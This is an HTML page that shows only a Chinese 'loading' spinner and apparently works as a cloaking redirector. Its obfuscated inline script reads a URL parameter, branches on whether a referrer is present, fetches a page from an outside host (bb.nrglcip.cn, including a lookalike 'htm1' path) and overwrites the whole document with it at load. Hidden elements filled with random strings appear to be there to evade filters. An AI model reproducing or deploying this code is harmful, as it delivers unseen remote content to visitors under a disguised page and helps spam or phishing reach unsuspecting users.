<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .cE17gz {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .cE17gz .VO9fKll {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .cE17gz .content {
            line-height: 50px;
            text-align: center
        }

        .cE17gz .img {
            width: 100%
        }

        .cE17gz .JL72wKaFr {
            text-align: center
        }

        .cE17gz .JL72wKaFr span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .cE17gz .JL72wKaFr span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .cE17gz .JL72wKaFr span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .cE17gz .JL72wKaFr span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .cE17gz .JL72wKaFr span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .cE17gz .JL72wKaFr span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .cE17gz .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function x81AotDal7X(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var fxLhUPp = x81AotDal7X('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ fxLhUPp +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ fxLhUPp +".html?a=share";
		}
		
        RjfO5wT=url+"#"+new Date().getTime();
        RjfO5wT && function() {
            $.get(RjfO5wT, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<a  href='#' style='display:none'>HiWc9zViq6hDwGYzQF8JaiUoJvhLy5vAbEGa6C0wokE3cYzLRtycN2Q6f9ibYYIQL3GkAsPV</a>
<a  href='#' style='display:none'>HiWc9zViq6hDwGYzQF8JaiUoJvhLy5vAbEGa6C0wokE3cYzLRtycN2Q6f9ibYYIQL3GkAsPV</a>
<img  src='' style='display:none'>
<p  style='display:none'>vDlHlT3qbf9U5rI2UvNtLesp8vRrn9JjytqKst5TKQcP27Jd1k</p>
<p  style='display:none'>vDlHlT3qbf9U5rI2UvNtLesp8vRrn9JjytqKst5TKQcP27Jd1k</p>
<li style='display:none' >iqm9Axdh23XOonCVEnvY1vqBtG6QrQlQNMDaZ4XFced0OZcILh</li>
<h1 style='display:none' >iXBRwLmSpcHwXbvYvC5Xk2jlfkxkGOKJZ2cqXHffJ16Chpjbp94z1CCBPdskuCh8cv</h1><div class="cE17gz">
    <div class="VO9fKll">
        <div class="JL72wKaFr">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>W1n8uJ0sPQ7i3UV8XyUC5UR</p>
<a  href='#' style='display:none'>iYQuE76dDGskrr7tr1tKtU9dHpiC53dY5bOYwN9JLdh1UZ7</a>
<span style='display:none'>H2LjcSYlXaoUbOHBAg90Xb9diXkeseWD39AaKttgqxbHaTR03teYs3CXNSycJYU2Mb</span></body>
</html>